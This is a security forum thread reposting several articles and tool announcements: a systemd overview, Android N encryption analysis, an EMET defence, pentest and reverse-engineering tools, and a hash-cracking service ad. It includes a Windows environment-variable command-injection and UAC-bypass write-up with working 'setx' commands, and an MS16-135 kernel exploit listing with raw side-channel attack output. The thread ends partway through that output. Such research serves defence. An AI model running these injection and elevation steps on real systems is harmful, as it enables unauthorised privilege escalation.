Nytro

Ar mai fi de incercat si asta: https://github.com/MooseDojo/apt2

Understanding Systemd Linux distributions are adopting or planning to adopt the systemd init system fast. systemd is a suite of system management daemons, libraries, and utilities designed as a central management and configuration platform for the Linux computer operating system. Described by its authors as a “basic building block” for an operating system, systemd primarily aims to replace the Linux init system (the first process executed in user space during the Linux startup process) inherited from UNIX System V and Berkeley Software Distribution (BSD). The name systemd adheres to the Unix convention of making daemons easier to distinguish by having the letter d as the last letter of the filename. systemd is designed for Linux and programmed exclusively for the Linux API. It is published as free and open-source software under the terms of the GNU Lesser General Public License (LGPL) version 2.1 or later. The design of systemd generated significant controversy within the free software community, leading the critics to argue that systemd’s architecture violates the Unix philosophy and that it will eventually form a system of interlocking dependencies. However, as of 2015 most major Linux distributions have adopted it as their default init system. Lennart Poettering and Kay Sievers, software engineers that initially developed systemd, sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies, to allow more processing to be done concurrently or in parallel during system booting, and to reduce the computational overhead of the shell. Poettering describes systemd development as “never finished, never complete, but tracking progress of technology”. In May 2014, Poettering further defined systemd as aiming to unify “pointless differences between distributions”, by providing the following three general functions: A system and service manager (manages both the system, as by applying various configurations, and its services) A software platform (serves as a basis for developing other software) The glue between applications and the kernel (provides various interfaces that expose functionalities provided by the kernel) systemd is not just the name of the init daemon but also refers to the entire software bundle around it, which, in addition to the systemd init daemon, includes the daemons journald, logind and networkd, and many other low-level components. In January 2013, Poettering described systemd not as one program, but rather a large software suite that includes 69 individual binaries. As an integrated software suite, systemd replaces the startup sequences and runlevels controlled by the traditional init daemon, along with the shell scripts executed under its control. systemd also integrates many other services that are common on Linux systems by handling user logins, the system console, device hotplugging, scheduled execution (replacing cron) logging, hostnames and locales. Like the init daemon, systemd is a daemon that manages other daemons, which, including systemd itself, are background processes. systemd is the first daemon to start during booting and the last daemon to terminate during shutdown. The systemd daemon serves as the root of the user space’s process tree; the first process (pid 1) has a special role on Unix systems, as it receives a SIGCHLD signal when a daemon process (which has detached from its parent) terminates. Therefore, the first process is particularly well suited for the purpose of monitoring daemons; systemd attempts to improve in that particular area over the traditional approach, which would usually not restart daemons automatically but only launch them once without further monitoring. systemd executes elements of its startup sequence in parallel, which is faster than the traditional startup sequence’s sequential approach. For inter-process communication (IPC), systemd makes Unix domain sockets and D-Bus available to the running daemons. The state of systemd itself can also be preserved in a snapshot for future recall. systemd records initialization instructions for each daemon in a configuration file (referred to as a “unit file”) that uses a declarative language, replacing the traditionally used per-daemon startup shell scripts. Unit file types include service, socket, device, mount, automount, swap, target, path, timer (which can be used as a cron-like job scheduler), snapshot, slice and scope. Articol complet: https://n0where.net/understanding-systemd/

Forum | Hash Manager | Hash Finder | Hash Verifier InsidePro Software offers professional and free solutions for recovering passwords to hashes! Our Forum unites the world's best experts in hash and password recovery; its features: – Devoted to recovering passwords to hashes of all types. – Here you can always get help on recovering your passwords. – Forum already contains over 200 thousand messages! Hash Manager is a solution for recovering passwords to hashes; its features: – Supports over 450 hashing algorithms. – Contains over 70 additional utilities for handling hashes, passwords, and dictionaries. – Optimized for working with large hash lists. – Comes in 64-bit version, which is much faster on many algorithms. – Supports unlimited number of loadable hashes, as well as dictionaries, rules, and masks. – Supports all most efficient hash attacks. – Supports multithreading. – Recovers passwords in Unicode. – Has modular architecture. – And much more! Hash Finder service is designed for looking up hashes in a huge database; its features: – Does not require registration. – Supports over 100 hashing algorithms, including salted hashes. – Supports hash list lookup. – Contains only real hashes and passwords (over 1 billion records). – Automatically detects algorithm. – For mixed lists, returns results on each algorithm separately. – Accumulates found hashes in a queue, which is continuously being processed. – Acquires new real hashes and passwords on a daily basis. – The service has checked over 10 billion hashes! Hash Verifier service is designed for automatic verification of hashes and passwords; its features: – Does not require registration. – Supports all most popular hashing algorithms. – Supports hash list verification (up to 1000 lines). – Stores links to successful verification for specified amount of time. – Supports user names and salts in the Hex format. – The service has verified over 80 thousand paid hashes! Sursa: http://www.insidepro.com/

Matthew Green in Uncategorized November 24, 2016 2,305 Words The limitations of Android N Encryption Over the past few years we’ve heard more about smartphone encryption than, quite frankly, most of us expected to hear in a lifetime. We learned that proper encryption can slow down even sophisticated decryption attempts if done correctly. We’ve also learned that incorrect implementations can undo most of that security. In other words, phone encryption is an area where details matter. For the past few weeks I’ve been looking a bit at the details of Android Nougat’s new file-based encryption to see how well they’ve addressed some of those details in their latest release. The answer, unfortunately, is that there’s still lots of work to do. In this post I’m going to talk about a bit of that. (As an aside: the inspiration for this post comes from Grugq, who has been loudly and angrily trying to work through these kinks to develop a secure Android phone. So credit where credit is due.) Background: file and disk encryption Disk encryption is much older than smartphones. Indeed, early encrypting filesystems date back at least to the early 1990s and proprietary implementations may go back before that. Even in the relatively new area of PCs operating systems, disk encryption has been a built-in feature since the early 2000s. The typical PC disk encryption system operates as follows. At boot time you enter a password. This is fed through a key derivation function to derive a cryptographic key. If a hardware co-processor is available (e.g., a TPM), your key is further strengthened by “tangling” it with some secrets stored in the hardware. This helps to lock encryption to a particular device. The actual encryption can be done in one of two different ways: Full Disk Encryption (FDE) systems (like Truecrypt, BitLocker and FileVault) encrypt disks at the level of disk sectors. This is an all-or-nothing approach, since the encryption drivers won’t necessarily have any idea what files those sectors represent. At the same time, FDE is popular — mainly because it’s extremely easy to implement. File-based Encryption (FBE) systems (like EncFS and eCryptFS) encrypt individual files. This approach requires changes to the filesystem itself, but has the benefit of allowing fine grained access controls where individual files are encrypted using different keys. Most commercial PC disk encryption software has historically opted to use the full-disk encryption (FDE) approach. Mostly this is just a matter of expediency: FDE is just significantly easier to implement. But philosophically, it also reflects a particular view of what disk encryption was meant to accomplish. In this view, encryption is an all-or-nothing proposition. Your machine is either on or off; accessible or inaccessible. As long as you make sure to have your laptop stolen only when it’s off, disk encryption will keep you perfectly safe. So what does this have to do with Android? Android’s early attempts at adding encryption to their phones followed the standard PC full-disk encryption paradigm. Beginning in Android 4.4 (Kitkat) through Android 6.0 (Marshmallow), Android systems shipped with a kernel device mapper called dm-crypt designed to encrypt disks at the sector level. This represented a quick and dirty way to bring encryption to Android phones, and it made sense — if you believe that phones are just very tiny PCs. The problem is that smartphones are not PCs. The major difference is that smartphone users are never encouraged to shut down their device. In practice this means that — after you enter a passcode once after boot — normal users spend their whole day walking around with all their cryptographic keys in RAM. Since phone batteries live for a day or more (a long time compared to laptops) encryption doesn’t really offer much to protect you against an attacker who gets their hands on your phone during this time. Of course, users do lock their smartphones. In principle, a clever implementation could evict sensitive cryptographic keys from RAM when the device locks, then re-derive them the next time the user logs in. Unfortunately, Android doesn’t do this — for the very simple reason that Android users want their phones to actually work. Without cryptographic keys in RAM, an FDE system loses access to everything on the storage drive. In practice this turns it into a brick. For this very excellent reason, once you boot an Android FDE phone it will never evict its cryptographic keys from RAM. And this is not good. So what’s the alternative? Android is not the only game in town when it comes to phone encryption. Apple, for its part, also gave this problem a lot of thought and came to a subtly different solution. Starting with iOS 4, Apple included a “data protection” feature to encrypt all data stored a device. But unlike Android, Apple doesn’t use the full-disk encryption paradigm. Instead, they employ a file-based encryption approach that individually encrypts each file on the device. In the Apple system, the contents of each file is encrypted under a unique per-file key (metadata is encrypted separately). The file key is in turn encrypted with one of several “class keys” that are derived from the user passcode and some hardware secrets embedded in the processor. iOS data encryption. Source: iOS Security Guide. The main advantage of the Apple approach is that instead of a single FDE key to rule them all, Apple can implement fine-grained access control for individual files. To enable this, iOS provides an API developers can use to specify which class key to use in encrypting any given file. The available “protection classes” include: Complete protection. Files encrypted with this class key can only be accessed when the device is powered up and unlocked. To ensure this, the class key is evicted from RAM a few seconds after the device locks. Protected Until First User Authentication. Files encrypted with this class key are protected until the user first logs in (after a reboot), and the key remains in memory. No protection. These files are accessible even when the device has been rebooted, and the user has not yet logged in. By giving developers the option to individually protect different files, Apple made it possible to build applications that can work while the device is locked, while providing strong protection for files containing sensitive data. Apple even created a fourth option for apps that simply need to create new encrypted files when the class key has been evicted from RAM. This class uses public key encryption to write new files. This is why you can safely take pictures even when your device is locked. Apple’s approach isn’t perfect. What it is, however, is the obvious result of a long and careful thought process. All of which raises the following question… Why the hell didn’t Android do this as well? The short answer is Android is trying to. Sort of. Let me explain. As of Android 7.0 (Nougat), Google has moved away from full-disk encryption as the primary mechanism for protecting data at rest. If you set a passcode on your device, Android N systems can be configured to support a more Apple-like approach that uses file encryption. So far so good. The new system is called Direct Boot, so named because it addresses what Google obviously saw as fatal problem with Android FDE — namely, that FDE-protected phones are useless bricks following a reboot. The main advantage of the new model is that it allows phones to access some data even before you enter the passcode. This is enabled by providing developers with two separate “encryption contexts”: Credential encrypted storage. Files in this area are encrypted under the user’s passcode, and won’t be available until the user enters their passcode (once). Device encrypted storage. These files are not encrypted under the user’s passcode (though they may be encrypted using hardware secrets). Thus they are available after boot, even before the user enters a passcode. Direct Boot even provides separate encryption contexts for different users on the phone — something I’m not quite sure what to do with. But sure, why not? If Android is making all these changes, what’s the problem? One thing you might have noticed is that where Apple had four categories of protection, Android N only has two. And it’s the two missing categories that cause the problems. These are the “complete protection” categories that allow the user to lock their device following first user authentication — and evict the keys from memory. Of course, you might argue that Android could provide this by forcing application developers to switch back to “device encrypted storage” following a device lock. The problem with this idea is twofold. First, Android documentation and sample code is explicit that this isn’t how things work: Moreover, a quick read of the documentation shows that even if you wanted to, there is no unambiguous way for Android to tell applications when the system has been re-locked. If keys are evicted when the device is locked, applications will unexpectedly find their file accesses returning errors. Even system applications tend to do badly when this happens. And of course, this assumes that Android N will even try to evict keys when you lock the device. Here’s how the current filesystem encryption code handles locks: While the above is bad, it’s important to stress that the real problem here is not really in the cryptography. The problem is that since Google is not giving developers proper guidance, the company may be locking Android into years of insecurity. Without (even a half-baked) solution to define a “complete” protection class, Android app developers can’t build their apps correctly to support the idea that devices can lock. Even if Android O gets around to implementing key eviction, the existing legacy app base won’t be able to handle it — since this will break a million apps that have implemented their security according to Android’s current recommendations. In short: this is a thing you get right from the start, or you don’t do at all. It looks like — for the moment — Android isn’t getting it right. Are keys that easy to steal? Of course it’s reasonable to ask whether it’s having keys in RAM is that big of concern in the first place. Can these keys actually be accessed? The answer to that question is a bit complicated. First, if you’re up against somebody with a hardware lab and forensic expertise, the answer is almost certainly “yes”. Once you’ve entered your passcode and derived the keys, they aren’t stored in some magically secure part of the phone. People with the ability to access RAM or the bus lines of the device can potentially nick them. But that’s a lot of work. From a software perspective, it’s even worse. A software attack would require a way to get past the phone’s lockscreen in order to get running code on the device. In older (pre-N) versions of Android the attacker might need to then escalate privileges to get access to Kernel memory. Remarkably, Android N doesn’t even store its disk keys in the Kernel — instead they’re held by the “vold” daemon, which runs as user “root” in userspace. This doesn’t make exploits trivial, but it certainly isn’t the best way to handle things. Of course, all of this is mostly irrelevant. The main point is that if the keys are loaded you don’t need to steal them. If you have a way to get past the lockscreen, you can just access files on the disk. What about hardware? Although a bit of a tangent, it’s worth noting that many high-end Android phones use some sort of trusted hardware to enable encryption. The most common approach is to use a trusted execution environment (TEE) running with ARM TrustZone. This definitely solves a problem. Unfortunately it’s not quite the same problem as discussed above. ARM TrustZone — when it works correctly, which is not guaranteed — forces attackers to derive their encryption keys on the device itself, which should make offline dictionary attacks on the password much harder. In some cases, this hardware can be used to cache the keys and reveal them only when you input a biometric such as a fingerprint. The problem here is that in Android N, this only helps you at the time the keys are being initially derived. Once that happens (i.e., following your first login), the hardware doesn’t appear to do much. The resulting derived keys seem to live forever in normal userspace RAM. While it’s possible that specific phones (e.g., Google’s Pixel, or Samsung devices) implement additional countermeasures, on stock Android N phones hardware doesn’t save you. So what does it all mean? How you feel about this depends on whether you’re a “glass half full” or “glass half empty” kind of person. If you’re an optimistic type, you’ll point out that Android is clearly moving in the right direction. And while there’s a lot of work still to be done, even a half-baked implementation of file-based implementation is better than the last generation of dumb FDE Android encryption. Also: you probably also think clowns are nice. On the other hand, you might notice that this is a pretty goddamn low standard. In other words, in 2016 Android is still struggling to deploy encryption that achieves (lock screen) security that Apple figured out six years ago. And they’re not even getting it right. That doesn’t bode well for the long term security of Android users. And that’s a shame, because as many have pointed out, the users who rely on Android phones are disproportionately poorer and more at-risk. By treating encryption as a relatively low priority, Google is basically telling these people that they shouldn’t get the same protections as other users. This may keep the FBI off Google’s backs, but in the long term it’s bad judgement on Google’s part. Sursa: https://blog.cryptographyengineering.com/2016/11/24/android-n-encryption/

Command Injection/Elevation – Environment Variables Revisited Yotam Gottesman November 24, 2016 Windows environment variables can be used to run commands and can also be used to bypass UAC, allowing an attacker with limited privileges to take complete control of the system. This code leverages a rather unusual scenario within Windows OS. This is a continuation of our research as described in a previous post: Elastic Boundaries on BreakingMalware.com Background and Research Basis In the last post on this topic, we have demonstrated that changing a location referred to by environment variables can divert file operations from a legitimate path to a possibly malicious one. Looking through the registry suggests different scenarios and possibilities that exist for environment variable expansion (ab)use. Let’s continue from where we left last time. Scenario 6: Command Injection Assumption: If a command contains an environment variable, it can be expanded into multiple executable commands. Possibility: An attacker can set up commands that will be executed when a different, unrelated file is opened or otherwise accessed. Application: A regular text file (.txt) opens with notepad.exe. The command to open such a file is: %SystemRoot%\System32\NOTEPAD.EXE %1 Effectively running this command: C:\Windows\System32\NOTEPAD.EXE <filename.txt> Now, by using this command: setx SystemRoot “C:\Windows\System32\cmd.exe && C:\Windows” The resulting line changes to: C:\Windows\System32\cmd.exe && C:\Windows\System32\NOTEPAD.EXE <filename.txt> Which means opening a command window before Notepad is called. “&&” means Notepad will run after the command exits, if it succeeds. There are other operators that could be used here instead. A command string, containing environment variables Scenario 7: Parameter Manipulation The Windows registry contains commands that parse and expand a string that contains multiple percent signs (‘%’) A parameter string, vulnerable to fake variable expansion Assumption: Anything between two percent signs is considered an environment variable and could be expanded as one. Possibility: An attacker can set an environment variable-like string to be expanded by Windows, manipulating command parameters. Application: Setting an environment variable named 1”, and pointing it to any dll file. Quote symbols must be escaped. setx “1\”,” “C:\Temp\evil.dll\”,” Result: Running any .cpl file on the system will run evil.dll instead. Scenario 8: Elevation using environment variables expansion. Again. Right-clicking “My Computer” (or “This PC”, on Windows 10) and choosing “Manage” from the context menu causes the “Computer Management” console to open with elevated privileges and without showing the UAC prompt. Behind the scenes, this behavior is defined by the verb “Manage” of the computer item’s class, as can be seen in the registry at this path: HKCR\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command The value for this key is: %SystemRoot%\system32\CompMgmtLauncher.exe Assumption: CompMgmtLauncher.exe runs with elevated privileges. Possibility: An attacker can take control of this command by setting SystemRoot and gain elevated privileges. Result: Failure. Our assumption is incorrect at this point. Changing the path did cause a different executable to launch instead of CompMgmtLauncher.exe, but it was running with medium integrity (i.e, not elevated). Further Research: So, what does CompMgmtLauncher.exe do to achieve elevated status? The Anomaly: CompMgmtLauncher.exe actually runs another link in the chain – a .lnk file, found in the Start Menu’s Administrative Tools folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk This link file points to the already familiar mmc.exe in Windows\System32, giving it an argument in the form of a .msc file, specifically compmgmt.msc. It appears that running mmc.exe by itself shows the UAC prompt, but running it with some specific .msc files does not. Assumption: CompMgmtLauncher.exe runs the file that the .lnk file points to with elevated privileges. Possibility: An attacker can control the target of the .lnk file and bypass UAC. Result: Failure. Not quite there yet. Writing to the directory and over the .lnk file requires high integrity to begin with. Further Research: The folder of interest is referenced by two environment variables: ALLUSERSPROFILE=C:\ProgramData ProgramData=C:\ProgramData Assumption: CompMgmtLauncher.exe uses one of these variables to access the .lnk file. Possibility: An attacker can change one or both of the mentioned environment variables and gain control over the called .lnk file. Application: Set ProgramData to point to a directory other than C:\ProgramData Create the correct directory tree: Microsoft\Windows\Start Menu\Programs\Administrative Tools Create a link (.lnk) that points to a string containing a command Call “Manage” on “My Computer”/”This PC”. or Run CompMgmtLauncher.exe Result: Success. Elevated command window using CompMgmtLauncher Conclusion and Thoughts The methods described here are not surprising news given previous findings. They also rely on an attacker having some access to the machine and possessing some privileges to initiate an attack. Nevertheless, environment variables can aid attackers in compromising a system and they provide some meaningful additions to their toolset. The images in the post are taken from a machine running Windows 7 32-bit. The methods have been tested on Windows 7 and Windows 10, both 32 and 64 bit versions and require no adjustments. There is still a lot more research to be conducted on the matter, on Windows and other operating systems. https://github.com/BreakingMalwareResearch/eleven Sursa: https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited/

Quickstart DriverBuddy Installation Instructions Copy DriverBuddy folder and DriverBuddy.py file into the IDA plugins folder C:\Program Files (x86)\IDA 6.8\plugins or wherever you installed IDA DriverBuddy Usage Instructions Start IDA and open a Windows kernel driver Go to Edit->Plugins and select Driver Buddy or press ctrl-alt-d Check Output window for DriverBuddy analysis results To decode IOCTLs, highlight the suspected IOCTL and press ctrl-alt-i DriverBuddy DriverBuddy is an IDAPython plugin that helps automate some of the tedium surrounding the reverse engineering of Windows Kernel Drivers. It has a number of handy features, such as: Identifying the type of driver Locating DispatchDeviceControl and DispatchInternalDeviceControl functions Populating common structs for WDF and WDM drivers Attempts to identify and label structs like the IRP and IO_STACK_LOCATION Labels calls to WDF functions that would normally be unlabeled Finding known IOCTL codes and decoding them Flagging functions prone to misuse Link: https://github.com/nccgroup/DriverBuddy

NEET - Network Enumeration and Exploitation Tool Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way. Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories. It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day. Link: https://github.com/JonnyHightower/neet

Windows 10 Cannot Protect Insecure Applications Like EMET Can POSTED ON NOVEMBER 21, 2016 BY WILL DORMANN IN VULNERABILITY MITIGATION Recently, Microsoft published a blog post called Moving Beyond EMET that appears to make two main points: (1) Microsoft will no longer support EMET after July 31, 2018, and (2) Windows 10 provides protections that make EMET unnecessary. In this blog post, I explain why Windows 10 does not provide the additional protections that EMET does and why EMET is still an important tool to help prevent exploitation of vulnerabilities. EMET Protections and How They Are Applied To compare protections of a Windows-with-EMET system against a stock Windows 10 system, it's important to first enumerate the protections that EMET 5.51 provides: System-Wide Protection Data Execution Prevention (DEP) Structured Exception Handler Overwrite Protection (SEHOP) Address Space Layout Randomization (ASLR) Certificate Trust (Pinning) Block Untrusted Fonts (Fonts) The system-wide DEP, SEHOP, and ASLR settings in EMET are provided by the Windows operating system itself. That is, the benefit of EMET for these settings is simply that it acts as a unified GUI application to make these changes in your system. Application-Specific Protection Data Execution Prevention (DEP) Structured Exception Handler Overwrite Protection (SEHOP) Null Page Allocation (NullPage) Heapspray Allocations (HeapSpray) Export Address Table Access Filtering (EAF) Export Address Table Access Filtering Plus (EAF+) Mandatory Address Space Layout Randomization (ASLR) Bottom-Up Randomization (BottomUpASLR) ROP Mitigations LoadLib MemProt Caller SimExecFlow StackPivot Attack Surface Reduction (ASR) Block Untrusted Fonts (Fonts) Application-specific EMET mitigations are applied by loading the EMET library into the process space of each protected application when it is launched. Here, the EMET library can modify the behavior of the target application by providing additional protections. The application-specific-protection capability provided by EMET is where EMET really adds value. Because we cannot rely on all software vendors to produce code that uses all of the exploit mitigations available, EMET puts this control back in our hands. Detailed descriptions of these protections can be found in the EMET 5.5 User's Guide. Visualizing Protections With and Without EMET To help visualize what EMET can do for us, it is useful to enumerate the exploit mitigations for various Windows versions, both with and without EMET. When it comes to system-wide mitigations, there's not much of a difference between a Windows system that has EMET installed and a stock Windows system that has had the mitigations enabled manually. This comparison, illustrated in the figure below, makes the true benefit of EMET clear: application-specific mitigations. It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured. Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system. Analyzing Microsoft's Statement The Microsoft Blog entry Moving Beyond EMET makes the following statement: Windows 10 includes all of the mitigation features that EMET administrators have come to rely on such as DEP, ASLR, and Control Flow Guard (CFG) along with many new mitigations to prevent bypasses in UAC and exploits targeting the browser. Let's look at the language used and analyze what Microsoft is actually saying and how people may interpret the sentence. Fact: Windows 10 supports DEP, ASLR, and Control Flow Guard (CFG). Fiction: Windows 10 makes EMET irrelevant. In Defense of EMET Microsoft's statement above overlooks the primary reason for someone to run EMET. In particular, users running EMET to protect applications that do not opt in to all of the exploit mitigations that it should. Even though the underlying Windows operating system supports a mitigation, doing so does not necessarily mean that it will be applied to an application. Developer adoption of exploit mitigations takes place at a slower rate than we'd like to see. For example, even Microsoft does not compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR. What is the impact? An attacker may be able to work around ASLR by causing a non-DYNAMICBASE library to be loaded into the process space of the vulnerable application, potentially resulting in successful exploitation of a memory corruption vulnerability. What do we do to protect ourselves against this situation? We run EMET with application-specific mitigations enabled! The Windows 10 EMET Fallacy Microsoft strongly implies that if you are running Windows 10, there is no need for EMET anymore. This implication is not true. The reason it's not true is that Windows 10 does not provide the application-specific mitigations that EMET does. Windows 10 does indeed provide some nice exploit mitigations. The problem is that the software that you are running needs to be specifically compiled to take advantage of them. Control Flow Guard (CFG) looks to provide similar protections to the ROP application-specific mitigations in EMET. The problem is that the application needs to be specifically compiled to take advantage of CFG. Out of all of the applications you run in your enterprise, do you know which ones are built with CFG support? If an application is not built to use CFG, it doesn't matter if your underlying operating system supports CFG or not. Update (November 21, 2016) Windows 10, version 1607 and Windows Server 2016 do support some application-specific mitigations. In particular, DEP, SEHOP, ASLR, and BottomupASLR. The table above has been updated to reflect this information. Setting these application-specific mitigations requires calculating and setting a bit field value in the Windows registry for each process name that you would like to protect. Please see Override Process Mitigation Options to help enforce app-related security policies for more details. EMET and Its End of Life Microsoft has announced that they will no longer support EMET beyond July 31, 2018. Some may use this end-of-life (EOL) statement as an excuse for not deploying EMET. If this is the case, it would be wise to investigate all of the software that is currently outside of the support window before July 31, 2018. If you are lucky enough that all of your applications are within their support cycle, EMET provides protections against exploitation of new and unknown memory-corruption vulnerabilities, known as "zero-days." Microsoft applications that will lose support a year before EMET are listed in Products Reaching End of Support for 2017. Office 2007 is in this list, for example. With such out-of-support applications, it is even more important to provide additional exploit protection with a product like EMET. When a vulnerability is discovered in a product outside of its support cycle, this vulnerability is referred to as a "forever-day." That is, the vulnerability will never be fixed. Just because Microsoft will stop supporting EMET after July 31, 2018 does not mean that the application will stop working beyond that date. It will likely continue to operate in the same way that it has been working all along. This EOL date simply means that you will not be able to get assistance from Microsoft after that date. Mitigations Without EMET As mentioned earlier, many of the system-wide mitigations exposed by EMET are actually provided by the underlying Windows operating system. The primary mitigations that can be enabled globally are DEP and ASLR. DEP System-wide DEP can be configured using the BCDEdit utility. Microsoft indicates, "Before setting BCDEdit options you might need to disable or suspend BitLocker and Secure Boot on the computer." To change the DEP setting to AlwaysOn, in a CMD prompt with administrative privileges run bcdedit.exe /set {current} nx AlwaysOn ASLR System-wide ASLR can be configured by importing the following registry value: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] "MoveImages"=dword:ffffffff Notes for System-Wide Settings EMET is not required for setting the above system-wide mitigations for DEP and ASLR. Enabling these features will make Windows more secure than the default configuration. However, the system-wide mitigations are less granular than what is available with EMET. In particular, if an application that you need to run is incompatible with a particular mitigation, it may not be possible to allow that application to run when the system-wide mitigations are in place. On a system with EMET, however, the system-wide mitigations can be relaxed, and compatible application-specific mitigations can be applied on a program-by-program basis. Conclusions and Recommendations While EMET itself is a free tool, successful deployment of it takes some work. But there are rewards to be reaped from this work. From an exploit mitigation perspective, upgrading to Windows 10 is a good idea. Installing EMET with application-specific mitigations configured is also a good idea. EMET provides some protection against zero-day vulnerabilities in supported software, as well as forever-day vulnerabilities in unsupported software. If the use of EMET is not possible, then the system-wide mitigations of DEP and ASLR can be applied without EMET. Windows 10 does not provide all of the mitigation features that EMET administrators have come to rely on. About the Author Will Dormann Contact Will Dormann Visit the SEI Digital Library for other publications by Will Sursa: https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html

Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) Complete Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip Presentation: https://www.exploit-db.com/docs/40822.pdf I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016 Requirements Intel Processor (Haswell or newer) Windows 10 x64 Usage Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry: C:\Users\qa\Desktop>ASLRSideChannelAttack.exe +] Setting thread affinity to CPU 0 +] Getting all the potential PML4 SelfRef +] Mapping a page oracle +] Allocating probing target pages... Allocation 0: 0000020E339D0000 Allocation 1: 0000020E339E0000 Allocation 2: 0000020E339F0000 Allocation 3: 0000020E33A00000 Allocation 4: 0000020E33A10000 -------------------------- +] Check that Unammped and Mapped values are consistent across several executions! -------------------------- Unmapped Initial: 256.683746 Mapped Initial: 203.692978 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.440018 Mapped: 202.827560 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213 +] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563 +] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382 +] PTE FFFF81010719D000 looks mapped! - Time: 197.297256 +] PTE FFFF81010719D080 looks mapped! - Time: 194.501175 +] PTE FFFF810804020100 looks mapped! - Time: 204.740097 +] Removing 102 from initial array and pushing it into final array Potential SelfRef: FFFF81C0E0703818 +] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616 +] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774 +] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921 +] PTE FFFF81810719D000 looks mapped! - Time: 202.525726 +] PTE FFFF81810719D080 looks mapped! - Time: 208.673874 Time difference exceed for ffff818804020100, retrying... +] PTE FFFF818804020100 looks mapped! - Time: 209.071213 +] Removing 103 from initial array and pushing it into final array Time difference exceed for ffff824120904820, retrying... Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642 Time difference exceed for ffff82010719cf00, retrying... +] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593 +] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344 +] PTE FFFF82010719D000 looks mapped! - Time: 207.820862 +] PTE FFFF82010719D080 looks mapped! - Time: 197.229263 +] PTE FFFF820804020100 looks mapped! - Time: 204.585739 +] Removing 104 from initial array and pushing it into final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003 Time difference exceed for ffff8341a0d06830, retrying... Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657 +] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697 +] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016 +] PTE FFFF83010719D000 looks mapped! - Time: 214.013504 +] PTE FFFF83010719D080 looks mapped! - Time: 191.688126 +] PTE FFFF830804020100 looks mapped! - Time: 193.314758 +] Removing 106 from initial array and pushing it into final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973 +] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693 +] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097 +] PTE FFFF83810719D000 looks mapped! - Time: 216.298660 +] PTE FFFF83810719D080 looks mapped! - Time: 203.848816 +] PTE FFFF838804020100 looks mapped! - Time: 204.008743 +] Removing 107 from initial array and pushing it into final array Time difference exceed for ffff89c4e2713898, retrying... Time difference exceed for ffff8bc5e2f178b8, retrying... Time difference exceed for ffff8c46231188c0, retrying... Unmapped Initial: 248.508636 Mapped Initial: 207.139847 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 236.360733 Mapped: 195.650040 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363 Potential SelfRef: FFFF81C0E0703818 Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... +] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393 Time difference exceed for ffff81810719cf00, retrying... +] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645 +] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724 +] PTE FFFF81810719D000 looks mapped! - Time: 197.655167 +] PTE FFFF81810719D080 looks mapped! - Time: 201.667160 +] PTE FFFF818804020100 looks mapped! - Time: 195.728439 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF81C0E0703818 - Index: 103 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff818000000000 -] Erasing 103 from final array Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 